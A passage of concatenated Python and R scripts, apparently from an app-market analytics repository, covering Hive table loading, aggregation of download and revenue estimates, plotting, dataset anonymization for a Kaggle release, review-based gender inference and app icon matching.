Usage: python %s [-h|-s|-l|-d|-i|-e|-c|-v|-x|-t|-a]
    [--help|--cluster_id|--load_date|--days|--init|--runHql|--clear_tables|--verbose|--default_schemas|--cluster_type|--incremental]
Options:
-h, --help Print help message
-s, --cluster_id Cluster id
-l, --load_date The end date for debug
-d, --days How many days do you want to load from the end date
-i, --init Prepare hive external tables for debugging
-e, --runHql Run Hive Sql, eg. 'show tables'
    -c, --clear_tables      Drop all tables
-v, --verbose Display additional information for debug
-x, --default_schemas Load default schemas
    -t, --cluster_type      Cluster type, default is "emr"
-a, --incremental Alter default tables by adding latest partition
""" % sys.argv[0]
if __name__ == '__main__':
node_count = 0
days = 14
load_date = (
datetime.datetime.today() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')
cluster_id = ""
cluster_type = "emr"
init = False
hql = None
drop = False
verbose = False
default = False
local = False
incremental = False
try:
opts, args = getopt.getopt(sys.argv[1:], "hs:d:l:ie:cvxt:a", [
"help", "cluster_id=" "days=", "load_date=", "init", "runHql=",
"clear_tables", "verbose", "default", "cluster_type=", 'incremental'
])
for o, a in opts:
if o in ('-h', '--help'):
usage()
exit()
if o in ('-s', '--cluster_id'):
cluster_id = a
if o in ('-d', '--days'):
days = int(a)
if o in ('-l', '--load_date'):
load_date = a
if o in ('-i', '--init'):
init = True
if o in ('-e', '--runHql'):
hql = a
if o in ('-c', '--clear_tables'):
drop = True
if o in ('-v', '--verbose'):
verbose = True
if o in ('-x', '--default_schemas'):
default = True
if o in ('-t', '--cluster_type'):
cluster_type = a
if o in ('-a', '--incremental'):
incremental = True
if len(cluster_id) > 0:
if init:
create_hive_tables(cluster_id, load_date, days, verbose, default, local, cluster_type, incremental)
elif hql:
status, output = runHiveStep(cluster_id, hql, verbose, cluster_type)
print output
elif drop:
status, output = drop_all_tables(cluster_id, verbose, cluster_type)
if status == 0:
print "Dropped all tables!"
else:
print "Drop tables failed!"
if verbose:
print output
else:
local = True
if init:
create_hive_tables(cluster_id, load_date, days, verbose, default, local, cluster_type, incremental)
elif hql:
status, output = runHiveStepLocal(hql, verbose)
print output
except getopt.GetoptError:
usage()
<file_sep>/old_investigations/select_monthly_top_apps.py
'''
Created on Jan 4, 2013
@author: perezrafael
'''
import pandas as pd
import os.path
import re
if __name__ == '__main__':
sda_dir = './android/sda'
top = 500
for root, dirs, files in os.walk(sda_dir):
for f in files:
if "_Aggregated.csv" in f:
fullpath = os.path.join(root, f)
df = pd.read_csv(fullpath)[['Unit', 'estimate_avg', 'App ID']]
df_downloads = df[df['Unit']=='Downloads'].sort('estimate_avg', ascending=False)[:top]
df_usd = df[df['Unit']=='USD'].sort('estimate_avg', ascending=False)[:top]
df_merged = df_downloads.merge(df_usd, on='App ID', how='outer')
df_merged = df_merged[['App ID']]
path = re.sub('_Aggregated\.csv$', '', fullpath)
df_merged.to_csv(path+'_top500.csv', index=False)<file_sep>/evaluation/py/internal/feeds_groupby_and_apply.py
"""
Aggregate different feeds (group by unit type)
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
import pandas as pd
from optparse import OptionParser
from collections import defaultdict
import stores_dict
def parse_options():
parser = OptionParser()
parser.add_option("-p", "--platform", dest="platform",
help="Required. The platform you want to get.")
(opts, args) = parser.parse_args()
try:
return (opts, args)
except Exception:
        parser.print_help()
def feeds_groupby_and_apply(func):
def call():
opts, args = parse_options()
_check_args(args)
feed_to_unit = eval('stores_dict.%s[\'feed_to_unit\']' % opts.platform.split('_')[0].lower())
input_dir = args[0]
output_dir = args[1]
filenames = filter(lambda s: s.endswith('.csv'), os.listdir(input_dir))
g = _group_filenames_by_unittype(filenames, feed_to_unit)
for (group_name, files) in g:
df = func([pd.read_csv(os.path.join(input_dir, f)) for f in files])
df.to_csv(os.path.join(output_dir, group_name), index=False)
return call
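# Example usage (a sketch; `concat_feeds` is illustrative, not part of this
# module): decorate a function that reduces a list of per-feed DataFrames into
# one DataFrame, then run it as a script entry point.
#
#   @feeds_groupby_and_apply
#   def concat_feeds(dfs):
#       return pd.concat(dfs)
#
#   if __name__ == '__main__':
#       concat_feeds()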
def _check_args(args):
if len(args) != 2:
raise Exception("Wrong number of arguments.")
input_dir = args[0]
output_dir = args[1]
if not (os.path.exists(input_dir) or os.path.exists(output_dir)):
raise Exception("Please make sure that both input and output dirs exist")
def _group_filenames_by_unittype(names, feed_to_unit):
# The second field in the filename is supposed to be feeds.
    def normalize_filename_to_unit(s):
        """Here we substitute the second field with its unit type.
Example:
For iOS. 143441_100_2012-07-01--2012-07-31.csv
-->
143441_Downloads_2012-07-01--2012-07-31.csv
"""
s_split = s.split('_')
s_split[1] = feed_to_unit[s_split[1]]
return '_'.join(s_split)
d = defaultdict(list)
for s in names:
        d[normalize_filename_to_unit(s)].append(s)
return d.iteritems()
<file_sep>/exact-matching-improvement/lib/__init__.py
__author__ = 'jjanssen'<file_sep>/old_investigations/android/plot_improvement_daily_vs_overall.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
# Select only when we have estimate from Overall
sub_df = subset(df, !is.na(estimate_overall))
# Remove outlier
sub_df <- subset(sub_df, abs(estimate_avg - units_avg) / units_avg < 100)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
# Calculate relative error and improvement.
df$Overall.Relative.Error <- abs(df$estimate_overall - df$units_avg) / df$units_avg
df$SDA.Relative.Error <- abs(df$estimate_avg - df$units_avg) / df$units_avg
df$SDA.Improvement <- df$Overall.Relative.Error - df$SDA.Relative.Error
f <- paste('plots/',
paste(metainfo$country, metainfo$period, 'improvement_daily_vs_overall.png', sep='_'), sep='')
png(file=f, width=1300, height=1700)
plot_improvement(df, metainfo, "Overall")
dev.off()
<file_sep>/google-analytics/aggregation_plot.py
from matplotlib.colors import LinearSegmentedColormap
from matplotlib import ticker
from matplotlib import pyplot as plt
from matplotlib import colors as mcolors
import numpy as np
def plot_colorbar(colormap, rank):
ctb, norm = mcolors.from_levels_and_colors(levels=rank, colors=colormap, extend='max')
sm=plt.cm.ScalarMappable(cmap=ctb, norm=norm)
sm._A=[]
    # Set colorbar, aspect ratio
    cbar = plt.colorbar(sm, alpha=0.6, aspect=16, shrink=1.0)
    cbar.solids.set_edgecolor("face")
    # Remove colorbar container frame
    cbar.outline.set_visible(False)
    # Font size for colorbar tick labels
    cbar.ax.tick_params(labelsize=30)
    # Customize colorbar tick labels
    cbar.formatter = ticker.FormatStrFormatter('%.2e')
    cbar.update_ticks()
    # Colorbar label, customize fontsize and distance to colorbar
    cbar.set_label('Total Active Users', alpha=0.7,
                   rotation=270, fontsize=20, labelpad=70)
    # Remove color bar tick lines, while keeping the tick labels
    cbarytks = plt.getp(cbar.ax.axes, 'yticklines')
    plt.setp(cbarytks, visible=False)
def plot_agg(full_data, MAUDIFF='Projected MAU DIFF %', AU='Active Users'):
for key in full_data['Country'].unique():
for dev in full_data['Device Type'].unique():
plot_data = full_data.groupby(['App Name', 'Device Type', 'Country']).\
agg({MAUDIFF:['mean', 'std'], AU:'sum'}).\
xs((key, dev), level=('Country', 'Device Type')).sort((AU, 'sum'))
MAU = plot_data[AU]['sum']
if MAU.shape[0] <= 1:
continue
color = MAU.rank() / MAU.rank().max()
cmap = [(1.0, 1.0-x, 0.0) for x in color ]
            ax = plot_data[MAUDIFF]['mean'].\
                plot(kind='bar', yerr=plot_data[MAUDIFF]['std'],
figsize=(30,10), color=cmap, fontsize=20,
error_kw=dict(ecolor='gray', lw=6, capsize=10,
capthick=0, alpha=0.4) )
plot_colorbar(sorted(cmap, reverse=True), MAU.sort(inplace=False))
yticks = ticker.FormatStrFormatter('%.2e%%')
ax.yaxis.set_major_formatter(yticks)
ax.set_xlabel('App Name', fontsize=25)
ax.set_ylabel(MAUDIFF, fontsize=25)
ax.set_title('Country = {}, Device = {}: App-level MAU DIFF %'.format(key, dev),
fontsize=30)
plt.show()
<file_sep>/kaggle/loader.py
'''
Created on Jun 13, 2013
@author: perezrafael
'''
import psycopg2
import pandas as pd
from pandas.io import sql
import itertools
import numpy as np
import calendar
import matplotlib.pyplot as plt
feeds_dict = {0:0,
1:1,
2:2,
100:1,
101:0,
102:2}
column_names ={'rank_iphone':'r1',
'rank_ipad':'r2',
'units':'t1a+t2a',
'revenue':'t1b+t2b',
'estimate_iphone_units':'t1a',
'estimate_ipad_units':'t2a',
'estimate_iphone_revenue':'t1b',
'estimate_ipad_revenue':'t2b',
'app_id':'a',
'feed_id':'f',
'category_id':'c',
'store_id':'s',
'date':'date'
}
def hash_map_column(df, column, addletter=False):
initial = column[:1]
column_hash = df[[column]].drop_duplicates().dropna()
shape = column_hash.shape[0]
total = 100
if shape>total:
random_values = np.random.permutation(np.arange(shape))
else:
random_values = np.random.permutation(np.arange(total))[:shape]
column_hash['randomized'] = random_values
if addletter:
column_hash['randomized'] = initial + column_hash['randomized'].map(str)
df = df.merge(column_hash, on=column)
df = df.drop(column, axis=1)
df.rename(columns={'randomized':column}, inplace=True)
column_hash.to_csv('%s.csv'%column, index=False)
return df
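# Example (a sketch): hash_map_column(df, 'app_id') replaces each app_id with a
# random integer label and writes the lookup table to app_id.csv.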
def anonymize(df):
hash_columns = ['app_id', 'category_id']
for hash_column in hash_columns:
df = hash_map_column(df, hash_column, False)
#df['feed_id'] = 'f' + df['feed_id'].map(int).map(str)
df['feed_id'] = df['feed_id'].map(int).map(str)
date = df[['date']].drop_duplicates().dropna().sort('date').reset_index().drop('index', axis=1).reset_index().rename(columns={'index':'date-mod'})
date.to_csv('date.csv', index=False)
df = df.merge(date, on='date')
df = df.drop('date', axis=1)
df.rename(columns={'date-mod':'date'}, inplace=True)
df['revenue_random_scaling'] = df['revenue'] * (scaling_revenue*0.995)+(np.random.rand(df.shape[0])*(scaling_revenue*0.01))
df['units_random_scaling'] = df['units'] * (scaling_units*0.995)+(np.random.rand(df.shape[0])*(scaling_units*0.01))
df['revenue_scaled_normalized_by_range'] = 1 + (((df['revenue_random_scaling']-df['revenue_random_scaling'].min())*(10000-1)) / (df['revenue_random_scaling'].max() - df['revenue_random_scaling'].min()))
df['units_scaled_normalized_by_range'] = 1 + (((df['units_random_scaling']-df['units_random_scaling'].min())*(10000-1)) / (df['units_random_scaling'].max() - df['units_random_scaling'].min()))
df = df.drop(['revenue', 'units', 'revenue_random_scaling', 'units_random_scaling'], axis=1)
df.rename(columns={'revenue_scaled_normalized_by_range':'revenue', 'units_scaled_normalized_by_range':'units'}, inplace=True)
df['revenue'] = np.around(df['revenue'], 10)
df['units'] = np.around(df['units'], 10)
df.rename(columns=column_names, inplace=True)
return df
def write_sets(df, name):
df.rename(columns=column_names, inplace=True)
df.drop(['t1a', 't1b', 't2a', 't2b', 's'],axis=1).to_csv('%s_full.csv'%name,index=False)
df[:10000].sort(['date','a']).to_csv('%s_example.csv'%name,index=False)
df.drop(['t1a', 't1b', 't2a', 't2b'],axis=1)[(df['t1a+t2a']>=0) | (df['t1b+t2b']>=0)].to_csv('%s_train.csv'%name,index=False)
df['t1a'] = None
df['t1b'] = None
df['t2a'] = None
df['t2b'] = None
df.drop(['t1a+t2a', 't1b+t2b'], axis=1).to_csv('%s_test.csv'%name,index=False)
def marks_thing(df):
df['situation'] = None
df['situation'][df['rank_iphone']<=100] = 'only_one_in_top_100'
df['situation'][df['rank_ipad']<=100] = 'only_one_in_top_100'
df['situation'][(df['rank_ipad']<=100) & (df['rank_iphone']<=100)] = 'both_in_top_100'
df['situation'][(df['rank_ipad']<=100) & (df['rank_iphone']>100)] = 'one_in_top_100'
df['situation'][(df['rank_ipad']>100) & (df['rank_iphone']<=100)] = 'one_in_top_100'
df['situation'][(df['rank_ipad']>100) & (df['rank_iphone']>100)] = 'none_in_top_100'
df = df[df['situation']>='0']
df = df[df['situation']!='none_in_top_100']
count = df.groupby(['store_id', 'category_id', 'feed_id', 'situation']).size().reset_index()
count.rename(columns={0:'count'}, inplace=True)
total = df.groupby(['store_id', 'category_id', 'feed_id']).size().reset_index()
total.rename(columns={0:'total'}, inplace=True)
total = total.merge(count, on=['store_id', 'category_id', 'feed_id'])
total['percentage'] = ((total['count']*1.0)/total['total']) * 100.0
total.to_csv('stats_%s.csv'%store_id_1, index=False)
df[['store_id', 'category_id', 'feed_id', 'date', 'rank_iphone', 'rank_ipad', 'app_id', 'situation']][(df['rank_ipad']<=100) | (df['rank_iphone']<=100)].to_csv('ranks_%s.csv'%store_id_1, index=False)
if __name__ == '__main__':
conn = psycopg2.connect("dbname=ios_dwh user=aa host=nile")
#query = 'select distinct category_id, feed_id from midnight_rank_list'
store_id_1 = 143466
date = '2013-02-01'
month = '2013-02'
range = calendar.monthrange(int(month.split('-')[0]), int(month.split('-')[1]))[1]
range = '%s-01--%s-%s'%(month, month, range)
data_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/ios_webui_dynamic'
scaling_revenue = 0.72
scaling_units = 0.36
ranks_sales_query = "SELECT date, app_id, rank, list_id, id \
FROM app_sales_date asd, midnight_ranks mr \
WHERE asd.app_id=mr.app_id \
AND asd.date='%s'"%(date)
ranks_query = "SELECT sales_day as date, store_id, feed_id, category_id, rank, app_id \
FROM midnight_rank_list mrl, midnight_ranks mr \
WHERE mrl.id=mr.list_id \
AND mrl.store_id=%s \
AND mrl.sales_day='%s'"%(store_id_1, date)
units_query = "SELECT date, store_id, app_id, units \
FROM app_sales_date asd, downloads d \
WHERE asd.id=d.app_sales_date_id \
AND d.store_id=%s \
AND asd.date='%s'"%(store_id_1, date)
#ranks_df = sql.frame_query(ranks_query, con=conn)
#units_df = sql.frame_query(units_query, con=conn)
df_actuals = pd.read_csv('%s/%s/real_daily_raw/%s_USD_%s.csv'%(data_dir, month, store_id_1, range)).rename(columns={'units':'revenue'}).\
merge(pd.read_csv('%s/%s/real_daily_raw/%s_Downloads_%s.csv'%(data_dir, month, store_id_1, range)), on=['date', 'app_id'], how='outer')
df_free = pd.read_csv('%s/%s/est_daily_raw/%s_0_%s.csv'%(data_dir, month, store_id_1, range)).\
merge(pd.read_csv('%s/%s/est_daily_raw/%s_101_%s.csv'%(data_dir, month, store_id_1, range)),\
on=['date', 'category_id', 'app_id'], suffixes=['_iphone', '_ipad'], how='outer').\
drop(['feed_id_iphone', 'feed_id_ipad'], axis=1).rename(columns={'estimate_iphone':'estimate_iphone_units', 'estimate_ipad':'estimate_ipad_units'})
df_paid = pd.read_csv('%s/%s/est_daily_raw/%s_1_%s.csv'%(data_dir, month, store_id_1, range)).\
merge(pd.read_csv('%s/%s/est_daily_raw/%s_100_%s.csv'%(data_dir, month, store_id_1, range)),\
on=['date', 'category_id', 'app_id'], suffixes=['_iphone', '_ipad'], how='outer').\
drop(['feed_id_iphone', 'feed_id_ipad'], axis=1).rename(columns={'estimate_iphone':'estimate_iphone_units', 'estimate_ipad':'estimate_ipad_units'})
df_grossing = pd.read_csv('%s/%s/est_daily_raw/%s_2_%s.csv'%(data_dir, month, store_id_1, range)).\
merge(pd.read_csv('%s/%s/est_daily_raw/%s_102_%s.csv'%(data_dir, month, store_id_1, range)),\
on=['date', 'category_id', 'app_id'], suffixes=['_iphone', '_ipad'], how='outer').\
drop(['feed_id_iphone', 'feed_id_ipad'], axis=1).rename(columns={'estimate_iphone':'estimate_iphone_revenue', 'estimate_ipad':'estimate_ipad_revenue'})
df_free['feed_id'] = 0
df_paid['feed_id'] = 1
df_grossing['feed_id'] = 2
df = pd.concat([df_free, df_paid, df_grossing]).merge(df_actuals, on=['date', 'app_id'], how='outer')
df['store_id'] = store_id_1
df.sort(['date', 'feed_id', 'category_id', 'rank_ipad', 'rank_iphone'], inplace=True)
#marks_thing(df)
df.to_csv('original.csv', index=False)
df = anonymize(df)
write_sets(df, 'kaggle')
<file_sep>/product_quality/filters.py
'''
Created on Apr 17, 2013
@author: perezrafael
'''
import pandas as pd
import sys
import os
import config
import numpy as np
import matplotlib as mpl
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
def _check_args():
if len(sys.argv) - 1 != 2:
raise Exception("Wrong number of arguments.")
monthly_dir = sys.argv[1]
weekly_dir = sys.argv[2]
if not (os.path.exists(monthly_dir) and os.path.exists(weekly_dir)):
raise Exception("Please make sure that monthly dir and weekly dir exist")
def filter_by_monthly(monthly_file, weekly_file, out_file, top):
df = pd.read_csv(monthly_file)
gdf = df.groupby('store_id')
groups = list()
for name, group in gdf:
group = group.sort('units', ascending=False)
group = group[:top]
groups.append(group)
df = pd.concat(groups)
df.rename(columns={'sbe':'estimate'}, inplace=True)
df['diff'] = df['units'] - df['estimate']
df['rel_diff'] = df['diff'] / df['units']
df['abs_diff'] = df['diff'].abs()
df['abs_rel_diff'] = df['rel_diff'].abs()
df2 = pd.read_csv(weekly_file)
df2['diff'] = df2['units'] - df2['estimate']
df2['rel_diff'] = df2['diff'] / df2['units']
df2['abs_diff'] = df2['diff'].abs()
df2['abs_rel_diff'] = df2['rel_diff'].abs()
df = df.merge(df2, on=['app_id', 'store_id'], how='inner', suffixes=['_monthly', '_weekly'])
df['diff_m_w'] = df['units_monthly'] - df['units_weekly']
#df = df[df['diff_m_w']<100]
df['abs_rel_diff_m_w'] = df['abs_rel_diff_monthly'] - df['abs_rel_diff_weekly']
df['abs_rel_estimates_diff_m_w'] = ((df['estimate_monthly'] - df['estimate_weekly'])/df['estimate_monthly']).abs()
out_dir = './data/filtered_%s'%top
if not os.path.exists(out_dir):
os.makedirs(out_dir)
df.to_csv('%s/%s'%(out_dir, out_file), index=False)
return df
def plot_df(df, out_file, what):
df = df[df['abs_rel_diff_monthly']<=1]
df = df[df['abs_rel_diff_weekly']<=1]
countries = df['store_id'].drop_duplicates()
    dir = './data/plots'
    if not os.path.exists(dir):
        os.makedirs(dir)
for country in countries:
fdf = df[df['store_id']==country]
if 'ios' in out_file:
country = config.IOS_STORES_DICT[country]
elif 'android' in out_file:
country = config.ANDROID_STORES_DICT[country]
plt.clf()
ax = plt.subplot(111)
if what=='error':
p1, = plt.plot(fdf['abs_rel_diff_monthly'], fdf['abs_rel_diff_monthly'], 'r')
#p2, = plt.plot(fdf['abs_rel_diff_monthly'], fdf['abs_rel_diff_weekly'], 'b.', alpha=0.4)
p2 = plt.scatter(fdf['abs_rel_diff_monthly'], fdf['abs_rel_diff_weekly'], c=np.log(fdf['units_monthly']), s=30, cmap=mpl.cm.afmhot)
ax.legend([p1,p2], ['SBE Error', 'Web UI Error'])
out_path='%s/error_%s_%s.png'%(dir,country, out_file)
elif what =='estimate':
p1, = plt.plot(fdf['units_monthly'], fdf['units_monthly'], 'r')
p2, = plt.plot(fdf['units_monthly'], fdf['estimate_monthly'], 'b.', alpha=0.4)
p3, = plt.plot(fdf['units_monthly'], fdf['estimate_weekly'], 'g.', alpha=0.4)
ax.legend([p1,p2,p3], ['Actuals', 'SBE Estimate', 'Web UI Estimate'])
out_path='%s/estimates_%s_%s.png'%(dir,country, out_file)
plt.title('%s_%s'%(country, out_file))
#ax.set_xscale('log')
#ax.set_yscale('log')
plt.savefig(out_path)
#plt.show()
def main():
_check_args()
monthly_dir = sys.argv[1]
weekly_dir = sys.argv[2]
file_paths = {}
for file1 in os.listdir(monthly_dir):
if file1.endswith('.csv'):
for file2 in os.listdir(weekly_dir):
if file2.endswith('.csv'):
if file1.replace('Monthly', '')==file2.replace('Weekly',''):
#file_paths[file] = []
#file_paths[file].append(os.path.join(monthly_dir, file))
#file_paths[file].append(os.path.join(weekly_dir, file))
path1 = os.path.join(monthly_dir, file1)
path2 = os.path.join(weekly_dir, file2)
df = filter_by_monthly(path1, path2, file1, 200)
plot_df(df, file1, 'error')
plot_df(df, file1, 'estimate')
if __name__ == '__main__':
main()
<file_sep>/audience/legacy_experiments/populate_app_gender_db_ios.py
import nltk
import pandas as pd
import random
import re
import numpy as np
from unidecode import unidecode
import psycopg2
import numpy as np
import argparse
def define_gender(x):
is_male = 0.5
if x['reviewer_p_male'] < 0.0 or (x['reviewer_p_male'] < 0.9 and x['reviewer_p_male'] > 0.1):
if x['review_p_male'] < 0.0:
if x['title_p_male'] < 0.0:
is_male = 0.5
elif x['title_p_male'] < 0.5:
is_male = 0.0
elif x['title_p_male'] > 0.5:
is_male = 1.0
elif x['review_p_male'] < 0.5:
is_male = 0.0
elif x['review_p_male'] > 0.5:
is_male = 1.0
elif x['reviewer_p_male'] < 0.5:
is_male = 0.0
elif x['reviewer_p_male'] > 0.5:
is_male = 1.0
return is_male
def main():
parser = argparse.ArgumentParser(description='Fill demographics db for selected store_id, period and field')
parser.add_argument('-s','--store_id', help='Store ID', type=int, required=True)
parser.add_argument('-d','--start_date', help='start date', required=True)
parser.add_argument('-e','--end_date', help='end date', required=True)
parser.add_argument('-c','--connection', help='Connection string to pass to postgres', required=True)
args = vars(parser.parse_args())
store_id = args['store_id']
start_date = args['start_date']
end_date = args['end_date']
connection_string = args['connection']
conn1 = psycopg2.connect(connection_string)
cur1 = conn1.cursor()
conn2 = psycopg2.connect(connection_string)
cur2 = conn2.cursor()
sql1 = 'select distinct app_id from aa_review where store_id=%s and date>=%s and date<=%s limit 100'
params1 = (store_id, start_date, end_date)
print cur1.mogrify(sql1, params1)
cur1.execute(sql1, params1)
for row in cur1:
app_id = row[0]
        # The loop below unpacks three probability columns; the review/title
        # column names here are assumed (as written, the query selected only
        # two columns, so the unpacking would fail).
        sql2 = 'select r1.p_male_from_name as reviewer_p_male, \
                r.p_male_from_review as review_p_male, \
                r.p_male_from_title as title_p_male \
                from reviewer_p r1, aa_review r \
                where r.reviewer=r1.reviewer \
                and r.app_id=%s \
                and r.store_id=%s \
                and r.date>=%s \
                and r.date<=%s'
params2 = (app_id, store_id, start_date, end_date)
#print cur1.mogrify(sql2, params2)
cur2.execute(sql2, params2)
df = []
for reviewer_p_male, review_p_male, title_p_male in cur2:
df.append({'reviewer_p_male': reviewer_p_male, 'review_p_male': review_p_male, 'title_p_male': title_p_male})
df = pd.DataFrame(df)
df['is_male'] = df.apply(define_gender, axis=1)
#sql2 = 'select name from aa_app where id=%s'
#params2 = (app_id, )
#cur2.execute(sql2, params2)
#app_name = cur2.fetchone()[0]
print df['is_male'].shape[0], df['is_male'].mean(), app_id
conn1.close()
conn2.close()
if __name__ == '__main__':
main()
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/pipelines.py
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import datetime
class ConvertData(object):
"""
Pipeline to convert data types of a item.
"""
def process_item(self, item, spider):
for field in ['n_tweets', 'n_lists', 'n_followers', 'n_following', 'n_favorites']:
if field in item and len(item[field]) > 0:
metric = item[field].split(' ')[0]
item[field] = int(metric.replace(',', ''))
if len(item['join_date']) > 0:
            item['join_date'] = datetime.datetime.strptime(item['join_date'], "%I:%M %p - %d %b %Y")
return item<file_sep>/old_investigations/plot_improvement_daily_vs_games.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
# Select only when we have estimate from Games
sub_df = subset(df, !is.na(estimate_games))
# Remove outlier
sub_df <- subset(sub_df, abs(estimate_avg - units_avg) / units_avg < 100)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
# Calculate relative error and improvement.
df$Games.Relative.Error <- abs(df$estimate_games - df$units_avg) / df$units_avg
df$SDA.Relative.Error <- abs(df$estimate_avg - df$units_avg) / df$units_avg
df$SDA.Improvement <- df$Games.Relative.Error - df$SDA.Relative.Error
f <- paste('plots/',
paste(metainfo$country, metainfo$period, 'improvement_daily_vs_games.png', sep='_'), sep='')
png(file=f, width=1300, height=1700)
plot_improvement(df, metainfo, "Games")
dev.off()
<file_sep>/aa_au_model/lib/get_device_types.py
import glob
import pandas as pd
import datetime
def get_device_info_from_ingest(startdate, enddate, bucketdir = '/s3mnt-projecta/aardvark-prod-ds-sample/VPN_DPI_INGEST/'):
"""
get device info per device per ingest file
:param startdate: startdate formatted like 'yyyymmdd'
:param enddate: enddate formatted like 'yyyymmdd'
:return: a DataFrame containing the imported data
"""
filedirs = map(lambda x:
bucketdir + pd.to_datetime(x).strftime('%Y-%m-%d') + '/',
pd.date_range(start=startdate,end=enddate))
column_names = ['timestamp','device_id','country','city','uri','user_agent','bundle_id','offset']
df = pd.DataFrame()
for filedir in filedirs:
filepaths = glob.glob(filedir + '/part*')
for filepath in filepaths:
if filepath.endswith('gz'):
compression='gzip'
else:
compression=None
data = pd.read_csv(filepath,
delimiter='\t',
header=-1,
compression=compression)
data.columns = column_names[0:len(data.columns)]
data_ua = data.groupby(['device_id','user_agent']).timestamp.count().reset_index()
data_ua['user_agent'] = data_ua.user_agent.apply(lambda x: str(x).lower())
data_ua['device'] = data_ua.user_agent.apply(lambda x: 'ipad' if 'ipad' in x else
'iphone' if 'iphone' in x else
'ipod' if 'ipod' in x else
'unknown')
data_ua = data_ua.groupby(['device_id','device']).timestamp.sum().reset_index()
data_ua['filepath'] = filepath
df = df.append(data_ua, ignore_index=True)
return df
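# Example usage (a sketch; dates follow the 'yyyymmdd' convention above):
#   info = get_device_info_from_ingest('20150101', '20150107')
#   device_types = get_device_type_per_device(info)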
def get_device_type_per_device(device_info):
"""
get device type per device
device_info: required input data frame as generated by get_device_info_from_ingest()
:return: a DataFrame containing the imported data
"""
df = device_info.groupby(['device_id','device']).timestamp.sum().reset_index()
device_types = pd.DataFrame()
for device_id in df.device_id.drop_duplicates():
index_row = df[df.device_id == device_id]['timestamp'].argmax()
device_type = pd.DataFrame(df.ix[index_row][['device_id','device']]).T
device_types = device_types.append(device_type, ignore_index=True)
return device_types
<file_sep>/exact-matching-improvement/icon_lib/data_generation.py
"""
Module for data generation. Does most computation, except for scraping and metric computation. Main functions:
- get_matches: get all matches from the database
- get_non_matches: generate (a sample of) non-matches
- get_app_info: get app details for all matched apps
- get_app_icon_metric: load icon metric (e.g. hashes) for matched apps from disk or recompute them
- combine_icon_metrics_with_pairs: combine pairs of apps (matches or non-matches) with their icon metrics
"""
__author__ = 'hgriffioen'
import numpy as np
import pandas as pd
import preprocessing
import random
import warnings
from config import (DEFAULT_HASH_TYPE, DEFAULT_HASH_SIZE, DEFAULT_HASHING_POOL_SIZE)
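# Example end-to-end usage (a sketch; `dbi` is assumed to be a database
# interface object exposing the query_* methods used below):
#   matches = get_matches(dbi, from_market=1, to_market=2)
#   apps = dbi.query_matched_apps()
#   non_matches = get_non_matches(matches, apps, 1, 2, n_sample=len(matches))
#   metrics = compute_app_icon_metrics(dbi)
#   labeled = combine_matches_and_non_matches(
#       combine_icon_metrics_with_pairs(matches, metrics),
#       combine_icon_metrics_with_pairs(non_matches, metrics))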
def get_matches(dbi, from_market, to_market, n_sample=None):
"""
Get matches between two markets.
:param dbi: Database interface object
:param from_market: ID of market to generate non-matches from
:param to_market: ID of market to generate matches to
:param n_sample: Number of samples to return (default is all)
:return: DataFrame with matches
Note: combines matches from both directions.
"""
all_matches = get_all_matches(dbi, do_force_symmetric_matches=True)
matches = all_matches[(all_matches.from_market == from_market) &
(all_matches.to_market == to_market)]
if n_sample is not None:
matches = sample_rows(matches, n_sample)
return matches
def get_all_matches(dbi, do_force_symmetric_matches=True):
"""
Get matches for all markets.
:param dbi: Database interface object
:param do_force_symmetric_matches: Make sure that are matches are present in both directions if True
:return: DataFrame with matches
"""
matches = dbi.query_all_matches()
if do_force_symmetric_matches:
matches = generate_symmetric_matches(matches)
return matches
def generate_symmetric_matches(matches):
"""
Duplicate matches so that they are present in both directions.
:param matches: DataFrame with matches
:return: DataFrames with matches for both directions
"""
symmetric_matches = pd.concat([matches,
matches.rename(columns={'from_market': 'to_market',
'from_app_id': 'to_app_id',
'to_market': 'from_market',
'to_app_id': 'from_app_id'},
copy=True)],
axis=0, ignore_index=True)
return symmetric_matches.drop_duplicates(subset=['from_market', 'to_market',
'from_app_id', 'to_app_id'])
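# Example (a sketch): a single match (market A, app X) -> (market B, app Y)
# becomes two rows, one per direction, before duplicates are dropped.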
def sample_rows(df, n_sample):
"""
Return a random sample of rows (index will be reset).
    :param df: DataFrame
:param n_sample: Number of rows to sample
:return: DataFrame with samples
"""
return df.ix[random.sample(df.index, n_sample)].reset_index(drop=True)
def get_non_matches(matches, matched_apps, from_market, to_market, n_sample=None, method='brute_force'):
"""
Get non-match combinations between matched apps between two markets.
:param matches: DataFrame with matches
:param matched_apps: DataFrame with matched apps
:param from_market: ID of market to generate non-matches from
:param to_market: ID of market to generate non-matches to
:param n_sample: Number of samples to return (default is all)
:param method: String with approach to sample with ('brute_force' or 'iterative')
:return: DataFrame with non-matches
"""
from_apps = matched_apps[matched_apps.market == from_market].copy()
to_apps = matched_apps[matched_apps.market == to_market].copy()
known_matches = matches[(matches.from_market == from_market) &
(matches.to_market == to_market)]
if method == 'brute_force':
non_matches = brute_force_sample_non_matches(from_apps, to_apps, known_matches, n_sample)
elif method == 'iterative':
non_matches = iteratively_sample_non_matches(from_apps, to_apps, known_matches, n_sample)
else:
raise Exception("Unknown method: " + method)
return non_matches
def brute_force_sample_non_matches(from_apps, to_apps, known_matches, n_sample=None):
"""
Brute force sample from all possible combinations between elements in from_apps and to_apps.
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:param known_matches: Combinations that are known to be matches
:param n_sample: Number of samples to draw (default is # of possible combinations)
:return: DataFrame with n_sample non-matches
"""
try:
all_combinations = get_all_combinations(from_apps, to_apps)
non_matches = remove_known_matches(all_combinations, known_matches)
if n_sample is not None:
non_matches = sample_rows(non_matches, n_sample)
except MemoryError:
